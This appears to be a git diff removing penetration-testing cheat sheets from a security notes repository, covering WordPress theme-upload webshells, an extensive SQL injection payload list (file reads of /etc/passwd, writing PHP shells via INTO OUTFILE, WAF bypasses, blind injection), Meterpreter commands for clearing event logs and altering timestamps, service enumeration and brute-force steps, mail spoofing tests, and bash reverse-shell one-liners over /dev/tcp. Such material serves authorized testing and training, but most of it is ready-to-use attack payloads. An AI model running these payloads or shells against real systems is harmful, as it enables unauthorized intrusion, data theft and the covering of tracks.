/pentest/web/scanners/joomscan/joomscan.pl -u <target-and-joomla-path>
/pentest/enumeration/web/cms-explorer -url <target-and-joomla-path> -type joomla
WordPress
WordPress default database configuration filename
<web-app-path>
WordPress default login page
<web-app-path> /wp-login.php
WordPress plugins
<web-app-path> /wp-content/plugins
Scanning WordPress for plugins and versions
/pentest/web/wpscan/wpscan.rb --url <target-and-wordpress-path&gt; -enumerate [u|p|v|t]
/pentest/enumeration/web/cms-explorer -url <target-and-wordpress-path> -type wordpress
Newer WP: "Themes" can be uploaded as zip files by WP administrators:
mkdir wpx
vi wpx/cmd.php
cat wpx/cmd.php
<?php system($_GET['cmd']) ?>
zip -r wpx.zip wpx
upload wpx.zip via web interface as an installed theme
Command execution access is via:
<web-app-path>/wp-content/plugins/wpx/cmd.php?cmd=<command(s)>
Older WP: Webshells can be added by editing exiting files/themes via the web interface or by enabling file upload and permitting the valid file extension (e.g. .php)
Cacti
Cacti default database configuration filename
<web-app-path> /include/config.php
DeV!L`z ClanPortal
DeV!L`z ClanPortal default database configuration filename
<web-app-path> /inc/mysql.php
Drupal
Drupal default database configuration filename
<web-app-path> /sites/default/settings.php
Scanning WordPress for plugins and versions
/pentest/enumeration/web/cms-explorer -url <target-and-drupal-path> -type drupal
Timeclock
Timeclock default database configuration filename
<web-app-path>/db.php
SQL Terminators/Comments
MSSQL and MySQL:
<sql injected command>;--
MySQL:
<sql injected command>;#
Login Pages Basic SQL injection
MS IIS
' OR '1=1';--
MySQL
'OR 1=1--
SQLMap commands
cd /pentest/database/sqlmap
Retrieve SQL Banner, current database and current user; test if the user is the db administrator
./sqlmap.py -u "http://<target>/index.php?param1=1&param2=2&param3=3" -p <injectable-parameter> --banner --current-db --current-user --is-dba
Source: http://it-ovid.blogspot.com/2012/04/web-application-exploitation-cheatsheet.html

+ 0
- 35
Draft/Cheat sheets reference pages Checklists -/Windows/Windows System Enumeration.txt View File

@ -1,35 +0,0 @@
##Windows Commands Reference
Netview.exe
Date /t
Systeminfo
Tasklist /svc services
It also impements various useful metafunctions, including a port of Rob Fuller's netview.exe tool, and some custom-written 'UserHunter' functions which will identify where on the network specific users are logged into. It can also check which machines on the domain the current user has local administrator access on. See function descriptions for appropriate usage and available options.
###Active Directory
Groups/Users in domain
net users /domain
net group /domain
net group “Domain Admins” /domain
Computers in a domain
Find user fileservers
Net use - look for mapped drives
Net user <username> /domain - extract home directory server

+ 0
- 0
Draft/Cheat sheets reference pages Checklists -/Windows/Windows.rtf View File


Draft/list_of_emoji.md → Draft/Cheat sheets reference pages Checklists -/list_of_emoji.md View File


Draft/metasploit.md → Draft/Cheat sheets reference pages Checklists -/metasploit.md View File


+ 0
- 111
Draft/Cheat sheets reference pages Checklists -/sqli cheat.txt View File

@ -1,111 +0,0 @@
CheatSheet: SQL Injection
Comments
/* – Multi line comment.
# – single line comment.
-- – single line comment.
/*!*/ – Mysql special comments.
Whitespaces.
+, %2B, %20, %09, %0d ,%0?, /**/, /*foo*/
Global system variables
@@datadir // Mysql data directory.
@@version_compile_os - //OS Mysql is running on.
@@version – //Mysql database version.
user() – //Current database user.
@@log_error – //Path to error log.
database() – //Current database.
The INFORMATION_SCHEMA database is made up of the following objects:
SCHEMATA
TABLES
COLUMNS
STATISTICS
USER_PRIVILEGES
SCHEMA_PRIVILEGES
TABLE_PRIVILEGES
COLUMN_PRIVILEGES
CHARACTER_SETS
COLLATIONS
COLLATION_CHARACTER_SET_APPLICABILITY
TABLE_CONSTRAINTS
KEY_COLUMN_USAGE
ROUTINES
VIEWS
TRIGGERS
PROFILING
Columns in a SELECT.
file.php?var=1 order by 10-- //Unknown column ’10' in ‘order clause’
file.php?var=1 and(select * from table)=(1)-- //Operand should contain 9 column(s)
Encoding. //For matching collations.
file.php?var=1 union select cast(version() as latin1)-- //5.0.11
file.php?var=1 union select convert(version() as binary)-- //5.0.11
file.php?var=1 union select aes_decrypt(aes_encrypt(version(),1),1)-- //5.0.11
file.php?var=1 union select unhex(hex(versions()))-- //5.0.11
File_priv.
file.php?var=1 union select user()-- //Checking current user. root@localhost
file.php?var=1 union select file_priv from mysql.user where user=’root’-- //Checking for the file priveledge on current user, Y =Yes N=No.
file.php?var=1 union select load_file(‘/etc/passwd’)-- // Loading system files.
file.php?var=1 and+(select+1+from+(select+count(0),concat((select+load_file(‘/etc/passwd’),floor(rand(0)*2))+from+information_schema.tables+group+by+2+limit+1)a)-- // Loading system files with error based injection.
file.php?var=1 union select “<?php system($_GET[c]);?>” into outfile ‘/dir/dir/shell.php’-- // Write code to a file.
file.php?var=1 limit 1 into outfile ‘/dir/dir/shell.php’ lines terminated by “<?php system($_GET[c]);?>”--+ //Write to a file.
WAF & security bypasses.
file.php?var=1 /*!union*/ /*select*/ version()-- //MySQL comments.
file.php?var=1 unUNIONion seleSELECTct version()-- //Filter bypass
file.php?var=1/**/union/**/select/**/version()-- //Whitespace bypass
file.php?var=1 UnION SElecT version()-- //Mixed upper/lower
file.php?var=1 uni/**/on sel/**/ect version()-- //php comments.
file.php?var=1 uni%6Fn select version()-- //URL encoding.
file.php?var=1 %252f%252a*/union%252f%252a /select%252f%252a*/1,2,3%252f%252a*/from%252f%252a*/users-- //Taking advantage of a WAF that only decodes input once.
file.php?var=1 0×414141414141414141414141414141414141 union select version()-- //Buffer overflow.
file.php?var=1 union select 0x3a3a3a-- //Encode to bypass magic quotes.
Extracting data from MySQL errors.
Rand()
file.php?var=1 and(select 1 from(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)--
file.php?var=1 or (select count(*)from(select 1 union select 2 union select 3)x group by concat(mid((select version() from information_schema.tables limit 1),1,64),floor(rand(0)*2)))--
file.php?var=1 and row(1,1)>(select count(*),concat(version(),0x3a,floor(rand(0)*2)) x from (select 1 union select 2)a group by x limit 1) --
file.php?var=1 or (select count(*) from table group by concat(version(),floor(rand(0)*2)))--
file.php?var=1 union select password from users where id=1 and row(1,1)>(select count(*),concat( (select users.password) ,0x3a,floor(rand()*2)) x from (select 1 union select 2 union select 3)a group by x limit 1) --
Name_const(Mysql 5.0.12 > 5.0.64)
file.php?var=1 or(1,2)=(select * from(select name_const(version(),1),name_const(version(),1))a)--
Extractvalue & updatexml (MySQL 5.1+)
file.php?var=1 and extractvalue(rand(),concat(0x3a,version()))-- //Xpath error
file.php?var=1 and updatexml(rand(),concat(0x3a,version()))-- //Xpath error
Misc.
file.php?var=(@:=1)or@ group by concat(@@version,@:=!@)having@||min(0)-- //Credits BlackFan.
file.php?var=(@:=9)or@ group by left(@@version,@:=~@)having@||min(0)-- //Credits Blackfan.
file.php?var=1 UNION SELECT * FROM (SELECT version() FROM information_schema.tables JOIN information_schema.tables b)a--
Injecting into an order byfile.php?var=(select if(substring(version(),1,1)=4,1,(select 1 union select 2)))--
file.php?var=1,ExtractValue(1,concat(0x5c,(sele ct table_name from information_schema.tables limit 1)))--
Blind.
file.php?var=1 and IF(ASCII(SUBSTRING((SELECT version()),1,1)))>=100,1, BENCHMARK(2000000,MD5(NOW())))-- //time based BSQLi
file.php?var=1 and IF(ASCII(SUBSTRING((SELECT USER()), 1, 1)))>=100, 1, SLEEP(3))-- //Time based BSQLi
file.php?var=1 AND (SELECT @a:=MID(BIN(FIND_IN_SET(MID(table_name,1,1), ‘a,b,c,d,e,f
,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,0,1,2,3,4,5,6,7,8,9,_,!,@,#,
$,%,^,&,*,(,),-,+,=,\,,.,”,\’,~,`,\\,|,{,},[,],:,;, ,’)),1,1) FROM in
formation_schema.tables LIMIT 1)=@a AND IF(@a!=”,@a,SLEEP(5))--
If Statement SQL Injection Attack Samples
SELECT IF(user()='root@localhost','true','false')
Load File
' UNION ALL SELECT LOAD_FILE('/etc/passwd') --
Create User
CREATE USER username IDENTIFIED BY 'password'; --
Drop User
DROP USER username; --
Make user to DBA
GRANT ALL PRIVILEGES ON *.* TO username@'%';
List Users
SELECT * FROM 'user' WHERE 1 LIMIT 0,30
SELECT * FROM mysql.user WHERE 1 LIMIT 1,1
SELECT * FROM mysql.user
Getting user defined tables SELECT table_name FROM information_schema.tables WHERE table_schema = 'tblUsers'
Getting Column NamesSELECT table_name, column_name FROM information_schema.columns WHERE table_schema = 'tblUsers’tblUsers -> tablename
SELECT table_schema, table_name FROM information_schema.columns WHERE column_name = 'username';
find table which have a column called 'username'
String without Quotes
SELECT CONCAT(CHAR(75),CHAR(76),CHAR(77))
This will return ‘KLM’.

+ 0
- 69
Draft/Counter_Surveillance.md View File

@ -1,69 +0,0 @@
# Counter Surveillance
I am not a professional and may be a twelve year old child. Be wary.
#### Table of Contents
* Cull
* [Guides/Write-ups](#guides)
* [Videos/Presentations](#videos)
* [Papers](#papers)
### <a name="guides">Guides/Write-ups</a>
* Writeups
* Detecting Surveillance - Spiderlabs blog
* [1 Hardware Implants](http://blog.spiderlabs.com/2014/03/detecting-surveillance-state-surveillance-part-1-hardware-impants.html)
* [2 Radio Frequency Exfiltration](http://blog.spiderlabs.com/2014/03/detecting-a-surveillance-state-part-2-radio-frequency-exfiltration.html)
* [3 Infected Firmware](http://blog.spiderlabs.com/2014/04/detecting-a-surveillance-state-part-3-infected-firmware.html)
* [A Simple Guide to TSCM Sweeps](http://www.international-intelligence.co.uk/tscm-sweep-guide.html)
* **Videos/Talks**
* [Fuck These Guys: Practical Countersurveillance Lisa Lorenzin - BsidesSF15](http://www.irongeek.com/i.php?page=videos/bsidessf2015/201-fck-these-guys-practical-countersurveillance-lisa-lorenzin)
* We've all seen the steady stream of revelations about the NSA's unconstitutional, illegal mass surveillance. Seems like there's a new transgression revealed every week! I'm getting outrage fatigue. So I decided to fight back... by looking for practical, realistic, everyday actions I can take to protect my privacy and civil liberties on the Internet, and sharing them with my friends. Join me in using encryption and privacy technology to resist eavesdropping and tracking, and to start to opt out of the bulk data collection that the NSA has unilaterally decided to secretly impose upon the world. Let's take back the Internet, one encrypted bit at a time.
* [Dr. Philip Polstra - Am I Being Spied On?](https://www.youtube.com/watch?v=Bc7WoDXhcjM)
* Talk on cheap/free counter measures
* [DNS May Be Hazardous to Your Health - Robert Stucke](https://www.youtube.com/watch?v=ZPbyDSvGasw)
* Great talk on attacking DNS
* [CounterStrike Lawful Interception](https://www.youtube.com/watch?v=7HXLaRWk1SM)
* This short talk will cover the standards, devices and implementation of a mandatory part of our western Internet infrastructure. The central question is whether an overarching interception functionality might actually put national Internet infrastructure at a higher risk of being attacked successfully. The question is approached in this talk from a purely technical point of view, looking at how LI functionality is implemented by a major vendor and what issues arise from that implementation. Routers and other devices may get hurt in the process.
* [Slides](http://phenoelit.org/stuff/CSLI.pdf)
-----
### <a name="papers">Papers</a>
* [Exploiting Lawful Intercept to Wiretap the Internet](https://www.blackhat.com/presentations/bh-dc-10/Cross_Tom/BlackHat-DC-2010-Cross-Attacking-LawfulI-Intercept-wp.pdf)
* This paper will review Cisco's architecture for lawful intercept from asecurity perspective. We explain how a number of different weaknesses in its design coupled with publicly disclosed security vulnerabilities could enable a malicious person to access the interface and spy on communications without leaving a trace. We then provide a set of recommendations for the redesign of the interface as well as SNMP authentication in general to better mitigate the security risks.

+ 0
- 19
Draft/Frameworks Methodologies/Metasploit Reference.txt View File

@ -1,19 +0,0 @@
Metasploit Reference
Meterpreter CMD Reference:
ps - (show running processes and their associated users/id numbers)
getuid - Get user ID
getpid - Gets the process ID
getprivs - (shows current privileges)
getsystem - Attempts to get SYSTEM using 4 methods, the last being a local exploit called Kitrap0d. This can sometimes be caught by host based IDS systems and even in rare occasions blue screen the machine.
sysinfo - Get system information
timestomp - Remove/screw up timestamps if you are good enough this messes up audit tools
clearev - Clears event logs
hashdump - dump SAM file hashes for pass the hash or cracking
migrate [pid] - Move from exploited process into another process

+ 0
- 110
Draft/Frameworks Methodologies/PTES - Penetration Testing Execution Standard/Discovery & Probing.txt View File

@ -1,110 +0,0 @@
Discovery & Probing
Discovery & Probing. Enumeration can serve two distinct purposes in an assessment: OS Fingerprinting Remote applications being served. OS fingerprinting or TCP/IP stack fingerprinting is the process of determining the operating system being utilised on a remote host. This is carried out by analyzing packets received from the host in question. There are two distinct ways to OS fingerprint, actively (i.e. nmap) or passively (i.e. scanrand). Passive OS fingerprinting determines the remote OS utilising the packets received only and does not require any packets to be sent. Active OS fingerprinting is very noisy and requires packets to be sent to the remote host and waits for a reply, (or lack thereof). Disparate OS's respond differently to certain types of packet, (the response is governed by an RFC and any proprietary responses the vendor (notably Microsoft) has enabled within the system) and so custom packets may be sent. Remote applications being served on a host can be determined by an open port on that host. By port scanning it is then possible to build up a picture of what applications are running and tailor the test accordingly.
Default Port Lists
Windows
*nix
Enumeration tools and techniques - The vast majority can be used generically, however, certain bespoke application require there own specific toolsets to be used. Default passwords are platform and vendor specific
General Enumeration Tools
nmap
nmap -n -A -PN -p- -T Agressive -iL nmap.targetlist -oX nmap.syn.results.xml
nmap -sU -PN -v -O -p 1-30000 -T polite -iL nmap.targetlist > nmap.udp.results
nmap -sV -PN -v -p 21,22,23,25,53,80,443,161 -iL nmap.targets > nmap.version.results
nmap -A -sS -PN -n --script:all ip_address --reason
grep "appears to be up" nmap_saved_filename | awk -F\( '{print $2}' | awk -F\) '{print $1}' > ip_list
netcat
nc -v -n IP_Address port
nc -v -w 2 -z IP_Address port_range/port_number
amap
amap -bqv 192.168.1.1 80
amap [-A|-B|-P|-W] [-1buSRHUdqv] [[-m] -o <file>] [-D <file>] [-t/-T sec] [-c cons] [-C retries] [-p proto] [-i <file>] [target port [port] ...]
xprobe2
xprobe2 192.168.1.1
sinfp
./sinfp.pl -i -p
nbtscan
nbtscan [-v] [-d] [-e] [-l] [-t timeout] [-b bandwidth] [-r] [-q] [-s separator] [-m retransmits] (-f filename) | (<scan_range>)
Hping
hping ip_address
Scanrand
scanrand ip_address:all
unicornscan
unicornscan [options `b:B:d:De:EFhi:L:m:M:pP:q:r:R:s:St:T:w:W:vVZ:' ] IP_ADDRESS/ CIDR_NET_MASK: S-E
Netenum
netenum network/netmask timeout
fping
fping -a -d hostname/ (Network/Subnet_Mask)
Firewall Specific Tools
firewalk
firewalk -p [protocol] -d [destination_port] -s [source_port] [internal_IP] [gateway_IP]
ftester
host 1 ./ftestd -i eth0 -v host 2 ./ftest -f ftest.conf -v -d 0.01 then ./freport ftest.log ftestd.log
Active Hosts
Open TCP Ports
Closed TCP Ports
Open UDP Ports
Closed UDP Ports
Service Probing
SMTP Mail Bouncing
Banner Grabbing
Other
HTTP
Commands
JUNK / HTTP/1.0
HEAD / HTTP/9.3
OPTIONS / HTTP/1.0
HEAD / HTTP/1.0
Extensions
WebDAV
ASP.NET
Frontpage
OWA
IIS ISAPI
PHP
OpenSSL
HTTPS
Use stunnel to encapsulate traffic.
SMTP
POP3
FTP
If banner altered, attempt anon logon and execute: 'quote help' and 'syst' commands.
ICMP Responses
Type 3 (Port Unreachable)
Type 8 (Echo Request)
Type 13 (Timestamp Request)
Type 15 (Information Request)
Type 17 (Subnet Address Mask Request)
Responses from broadcast address
Source Port Scans
TCP/UDP 53 (DNS)
TCP 20 (FTP Data)
TCP 80 (HTTP)
TCP/UDP 88 (Kerberos)
Firewall Assessment
Firewalk
TCP/UDP/ICMP responses
OS Fingerprint

+ 0
- 832
Draft/Frameworks Methodologies/PTES - Penetration Testing Execution Standard/Enumeration.txt View File

@ -1,832 +0,0 @@
Enumeration
FTP port 21 open
Fingerprint server
telnet ip_address 21 (Banner grab)
Run command ftp ip_address
ftp@example.com
Check for anonymous access
ftp ip_addressUsername: anonymous OR anonPassword: any@email.com
Password guessing
Hydra brute force
medusa
Brutus
Examine configuration files
ftpusers
ftp.conf
proftpd.conf
MiTM
pasvagg.pl
SSH port 22 open
Fingerprint server
telnet ip_address 22 (banner grab)
scanssh
scanssh -p -r -e excludes random(no.)/Network_ID/Subnet_Mask
Password guessing
ssh root@ip_address
guess-who
./b -l username -h ip_address -p 22 -2 < password_file_location
Hydra brute force
brutessh
Ruby SSH Bruteforcer
Examine configuration files
ssh_config
sshd_config
authorized_keys
ssh_known_hosts
.shosts
SSH Client programs
tunnelier
winsshd
putty
winscp
Telnet port 23 open
Fingerprint server
telnet ip_address
Common Banner ListOS/BannerSolaris 8/SunOS 5.8Solaris 2.6/SunOS 5.6Solaris 2.4 or 2.5.1/Unix(r) System V Release 4.0 (hostname)SunOS 4.1.x/SunOS Unix (hostname)FreeBSD/FreeBSD/i386 (hostname) (ttyp1)NetBSD/NetBSD/i386 (hostname) (ttyp1)OpenBSD/OpenBSD/i386 (hostname) (ttyp1)Red Hat 8.0/Red Hat Linux release 8.0 (Psyche)Debian 3.0/Debian GNU/Linux 3.0 / hostnameSGI IRIX 6.x/IRIX (hostname)IBM AIX 4.1.x/AIX Version 4 (C) Copyrights by IBM and by others 1982, 1994.IBM AIX 4.2.x or 4.3.x/AIX Version 4 (C) Copyrights by IBM and by others 1982, 1996.Nokia IPSO/IPSO (hostname) (ttyp0)Cisco IOS/User Access VerificationLivingston ComOS/ComOS - Livingston PortMaster
telnetfp
Password Attack
Common passwords
Hydra brute force
Brutus
telnet -l "-froot" hostname (Solaris 10+)
Examine configuration files
/etc/inetd.conf
/etc/xinetd.d/telnet
/etc/xinetd.d/stelnet
Sendmail Port 25 open
Fingerprint server
telnet ip_address 25 (banner grab)
Mail Server Testing
Enumerate users
VRFY username (verifies if username exists - enumeration of accounts)
EXPN username (verifies if username is valid - enumeration of accounts)
Mail Spoof Test
HELO anything MAIL FROM: spoofed_address RCPT TO:valid_mail_account DATA . QUIT
Mail Relay Test
HELO anything
Identical to/from - mail from: <nobody@domain> rcpt to: <nobody@domain>
Unknown domain - mail from: <user@unknown_domain>
Domain not present - mail from: <user@localhost>
Domain not supplied - mail from: <user>
Source address omission - mail from: <> rcpt to: <nobody@recipient_domain>
Use IP address of target server - mail from: <user@IP_Address> rcpt to: <nobody@recipient_domain>
Use double quotes - mail from: <user@domain> rcpt to: <"user@recipent-domain">
User IP address of the target server - mail from: <user@domain> rcpt to: <nobody@recipient_domain@[IP Address]>
Disparate formatting - mail from: <user@[IP Address]> rcpt to: <@domain:nobody@recipient-domain>
Disparate formatting2 - mail from: <user@[IP Address]> rcpt to: <recipient_domain!nobody@[IP Address]>
Examine Configuration Files
sendmail.cf
submit.cf
DNS port 53 open
Fingerprint server/ service
host
host [-aCdlnrTwv ] [-c class ] [-N ndots ] [-R number ] [-t type ] [-W wait ] name [server ] -v verbose format -t (query type) Allows a user to specify a record type i.e. A, NS, or PTR. -a Same as –t ANY. -l Zone transfer (if allowed). -f Save to a specified filename.
nslookup
nslookup [ -option ... ] [ host-to-find | - [ server ]]
dig
dig [ @server ] [-b address ] [-c class ] [-f filename ] [-k filename ] [-p port# ] [-t type ] [-x addr ] [-y name:key ] [-4 ] [-6 ] [name ] [type ] [class ] [queryopt... ]
whois-h Use the named host to resolve the query -a Use ARIN to resolve the query -r Use RIPE to resolve the query -p Use APNIC to resolve the query -Q Perform a quick lookup
DNS Enumeration
Bile Suite
perl BiLE.pl [website] [project_name]
perl BiLE-weigh.pl [website] [input file]
perl vet-IPrange.pl [input file] [true domain file] [output file] <range>
perl vet-mx.pl [input file] [true domain file] [output file]
perl exp-tld.pl [input file] [output file]
perl jarf-dnsbrute [domain_name] (brutelevel) [file_with_names]
perl qtrace.pl [ip_address_file] [output_file]
perl jarf-rev [subnetblock] [nameserver]
txdns
txdns -rt -t domain_name
txdns -x 50 -bb domain_name
txdns --verbose -fm wordlist.dic --server ip_address -rr SOA domain_name -h c: \hostlist.txt
Examine Configuration Files
host.conf
resolv.conf
named.conf
TFTP port 69 open
TFTP Enumeration
tftp ip_address PUT local_file
tftp ip_address GET conf.txt (or other files)
Solarwinds TFTP server
tftp – i <IP> GET /etc/passwd (old Solaris)
TFTP Bruteforcing
TFTP bruteforcer
Cisco-Torch
Finger Port 79 open
User enumeration
finger 'a b c d e f g h' @example.com
finger admin@example.com
finger user@example.com
finger 0@example.com
finger .@example.com
finger **@example.com
finger test@example.com
finger @example.com
Command execution
finger "|/bin/id@example.com"
finger "|/bin/ls -a /@example.com"
Finger Bounce
finger user@host@victim
finger @internal@external
Web Ports 80, 8080 etc. open
Fingerprint server
Telnet ip_address port
Firefox plugins
All
firecat
Specific
add n edit cookies
asnumber
header spy
live http headers
shazou
web developer
Crawl website
lynx [options] startfile/URL Options include -traversal -crawl -dump -image_links -source
httprint
Metagoofil
metagoofil.py -d [domain] -l [no. of] -f [type] -o results.html
Web Directory enumeration
Nikto
nikto [-h target] [options]
DirBuster
Wikto
Goolag Scanner
Vulnerability Assessment
Manual Tests
Default Passwords
Install Backdoors
ASP
http://packetstormsecurity.org/UNIX/penetration/aspxshell.aspx.txt
Assorted
http://michaeldaw.org/projects/web-backdoor-compilation/
http://open-labs.org/hacker_webkit02.tar.gz
Perl
http://home.arcor.de/mschierlm/test/pmsh.pl
http://pentestmonkey.net/tools/perl-reverse-shell/
http://freeworld.thc.org/download.php?t=r&f=rwwwshell-2.0.pl.gz
PHP
http://php.spb.ru/remview/
http://pentestmonkey.net/tools/php-reverse-shell/
http://pentestmonkey.net/tools/php-findsock-shell/
Python
http://matahari.sourceforge.net/
TCL
http://www.irmplc.com/download_pdf.php?src=Creating_Backdoors_in_Cisco_IOS_using_Tcl.pdf&force=yes
Bash Connect Back Shell
GnuCitizen
Atttack Box: nc -l -p Port -vvv
Victim: $ exec 5<>/dev/tcp/IP_Address/Port
Victim: $ cat <&5 | while read line; do $line 2>&5 >&5; done
Neohapsis
Atttack Box: nc -l -p Port -vvv
Victim: $ exec 0</dev/tcp/IP_Address/Port # First we copy our connection over stdin
Victim: $ exec 1>&0 # Next we copy stdin to stdout
Victim: $ exec 2>&0 # And finally stdin to stderr
Victim: $ exec /bin/sh 0</dev/tcp/IP_Address/Port 1>&0 2>&0
Method Testing
nc IP_Adress Port
HEAD / HTTP/1.0
OPTIONS / HTTP/1.0
PROPFIND / HTTP/1.0
TRACE / HTTP/1.1
PUT http://Target_URL/FILE_NAME
POST http://Target_URL/FILE_NAME HTTP/1.x
Upload Files
curl
curl -u <username:password> -T file_to_upload <Target_URL>
curl -A "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" <Target_URL>
put.pl
put.pl -h target -r /remote_file_name -f local_file_name
webdav
cadaver
View Page Source
Hidden Values
Developer Remarks
Extraneous Code
Passwords!
Input Validation Checks
NULL or null
Possible error messages returned.
' , " , ; , <!
Breaks an SQL string or query; used for SQL, XPath and XML Injection tests.
– , = , + , "
Used to craft SQL Injection queries.
‘ , &, ! , ¦ , < , >
Used to find command execution vulnerabilities.
"><script>alert(1)</script>
Basic Cross-Site Scripting Checks.
%0d%0a
Carriage Return (%0d) Line Feed (%0a)
HTTP Splitting
language=?foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2047%0d%0a%0d%0a<html>Insert undesireable content here</html>
i.e. Content-Length= 0 HTTP/1.1 200 OK Content-Type=text/html Content-Length=47<html>blah</html>
Cache Poisoning
language=?foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20304%20Not%20Modified%0d%0aContent-Type:%20text/html%0d%0aLast-Modified:%20Mon,%2027%20Oct%202003%2014:50:18%20GMT%0d%0aContent-Length:%2047%0d%0a%0d%0a<html>Insert undesireable content here</html>
%7f , %ff
byte-length overflows; maximum 7- and 8-bit values.
-1, other
Integer and underflow vulnerabilities.
%n , %x , %s
Testing for format string vulnerabilities.
../
Directory Traversal Vulnerabilities.
% , _, *
Wildcard characters can sometimes present DoS issues or information disclosure.
Ax1024+
Overflow vulnerabilities.
Automated table and column iteration
orderby.py
./orderby.py www.site.com/index.php?id=
d3sqlfuzz.py
./d3sqlfuzz.py www.site.com/index.php?id=-1+UNION+ALL+SELECT+1,COLUMN,3+FROM+TABLE--
Vulnerability Scanners
Acunetix
Grendelscan
NStealth
Obiwan III
w3af
Specific Applications/ Server Tools
Domino
dominoaudit
dominoaudit.pl [options] -h <IP>
Joomla
cms_few
./cms.py <site-name>
joomsq
./joomsq.py <IP>
joomlascan
./joomlascan.py <site> <options> [options i.e. -p/-proxy <host:port> : Add proxy support -404 : Don't show 404 responses]
joomscan
./joomscan.py -u "www.site.com/joomladir/" -o site.txt -p 127.0.0.1:80
jscan
jscan.pl -f hostname
(shell.txt required)
aspaudit.pl
asp-audit.pl http://target/app/filename.aspx (options i.e. -bf)
Vbulletin
vbscan.py
vbscan.py <host> <port> -v
vbscan.py -update
ZyXel
zyxel-bf.sh
snmpwalk
snmpwalk -v2c -c public IP_Address 1.3.6.1.4.1.890.1.2.1.2
snmpget
snmpget -v2c -c public IP_Address 1.3.6.1.4.1.890.1.2.1.2.6.0
Proxy Testing
Burpsuite
Crowbar
Interceptor
Paros
Requester Raw
Suru
WebScarab
Examine configuration files
Generic
Examine httpd.conf/ windows config files
JBoss
JMX Console http://<IP>:8080/jmxconcole/
War File
Joomla
configuration.php
diagnostics.php
joomla.inc.php
config.inc.php
Mambo
configuration.php
config.inc.php
Wordpress
setup-config.php
wp-config.php
ZyXel
/WAN.html (contains PPPoE ISP password)
/WLAN_General.html and /WLAN.html (contains WEP key)
/rpDyDNS.html (contains DDNS credentials)
/Firewall_DefPolicy.html (Firewall)
/CF_Keyword.html (Content Filter)
/RemMagWWW.html (Remote MGMT)
/rpSysAdmin.html (System)
/LAN_IP.html (LAN)
/NAT_General.html (NAT)
/ViewLog.html (Logs)
/rpFWUpload.html (Tools)
/DiagGeneral.html (Diagnostic)
/RemMagSNMP.html (SNMP Passwords)
/LAN_ClientList.html (Current DHCP Leases)
Config Backups
/RestoreCfg.html
/BackupCfg.html
Note: - The above config files are not human readable and the following tool is required to breakout possible admin credentials and other important settings
ZyXEL Config Reader
Examine web server logs
c:\winnt\system32\Logfiles\W3SVC1
awk -F " " '{print $3,$11} filename | sort | uniq
References
White Papers
Cross Site Request Forgery: An Introduction to a Common Web Application Weakness
Attacking Web Service Security: Message Oriented Madness, XML Worms and Web Service Security Sanity
Blind Security Testing - An Evolutionary Approach
Command Injection in XML Signatures and Encryption
Input Validation Cheat Sheet
SQL Injection Cheat Sheet
Books
Hacking Exposed Web 2.0
Hacking Exposed Web Applications
The Web Application Hacker's Handbook
Exploit Frameworks
Brute-force Tools
Acunetix
Metasploit
w3af
Portmapper port 111 open
rpcdump.py
rpcdump.py username:password@IP_Address port/protocol (i.e. 80/HTTP)
rpcinfo
rpcinfo [options] IP_Address
NTP Port 123 open
NTP Enumeration
ntpdc -c monlist IP_ADDRESS
ntpdc -c sysinfo IP_ADDRESS
ntpq
host
hostname
ntpversion
readlist
version
Examine configuration files
ntp.conf
NetBIOS Ports 135-139,445 open
NetBIOS enumeration
Enum
enum <-UMNSPGLdc> <-u username> <-p password> <-f dictfile> <hostname|ip>
Null Session
net use \\192.168.1.1\ipc$ "" /u:""
net view \\ip_address
Dumpsec
Smbclient
smbclient -L //server/share password options
Superscan
Enumeration tab.
user2sid/sid2user
Winfo
NetBIOS brute force
Hydra
Brutus
Cain & Abel
getacct
NAT (NetBIOS Auditing Tool)
Examine Configuration Files
Smb.conf
lmhosts
SNMP port 161 open
Default Community Strings
public
private
cisco
cable-docsis
ILMI
MIB enumeration
Windows NT
.1.3.6.1.2.1.1.5 Hostnames
.1.3.6.1.4.1.77.1.4.2 Domain Name
.1.3.6.1.4.1.77.1.2.25 Usernames
.1.3.6.1.4.1.77.1.2.3.1.1 Running Services
.1.3.6.1.4.1.77.1.2.27 Share Information
Solarwinds MIB walk
Getif
snmpwalk
snmpwalk -v <Version> -c <Community string> <IP>
Snscan
Applications
ZyXel
snmpget -v2c -c <Community String> <IP> 1.3.6.1.4.1.890.1.2.1.2.6.0
snmpwalk -v2c -c <Community String> <IP> 1.3.6.1.4.1.890.1.2.1.2
SNMP Bruteforce
onesixtyone
onesixytone -c SNMP.wordlist <IP>
cat
./cat -h <IP> -w SNMP.wordlist
Solarwinds SNMP Brute Force
ADMsnmp
Examine SNMP Configuration files
snmp.conf
snmpd.conf
snmp-config.xml
LDAP Port 389 Open
ldap enumeration
ldapminer
ldapminer -h ip_address -p port (not required if default) -d
luma
Gui based tool
ldp
Gui based tool
openldap
ldapsearch [-n] [-u] [-v] [-k] [-K] [-t] [-A] [-L[L[L]]] [-M[M]] [-d debuglevel] [-f file] [-D binddn] [-W] [-w passwd] [-y passwdfile] [-H ldapuri] [-h ldaphost] [-p ldapport] [-P 2|3] [-b searchbase] [-s base|one|sub] [-a never|always|search|find] [-l timelimit] [-z sizelimit] [-O security-properties] [-I] [-U authcid] [-R realm] [-x] [-X authzid] [-Y mech] [-Z[Z]] filter [attrs...]
ldapadd [-c][-S file][-n][-v][-k][-K][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile][-h ldaphost][-p ldap-port][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x][-X authzid][-Y mech][-Z[Z]][-f file]
ldapdelete [-n][-v][-k][-K][-c][-M[M]][-d debuglevel][-f file][-D binddn][-W][-w passwd][-y passwdfile][-H ldapuri][-h ldaphost][-P 2|3][-p ldapport][-O security-properties][-U authcid][-R realm][-x][-I][-Q] [-X authzid][-Y mech][-Z[Z]][dn]
ldapmodify [-a][-c][-S file][-n][-v][-k][-K][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile][-H ldapuri][-h ldaphost][-p ldapport][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x][-X authzid][-Y mech][-Z[Z]][-f file]
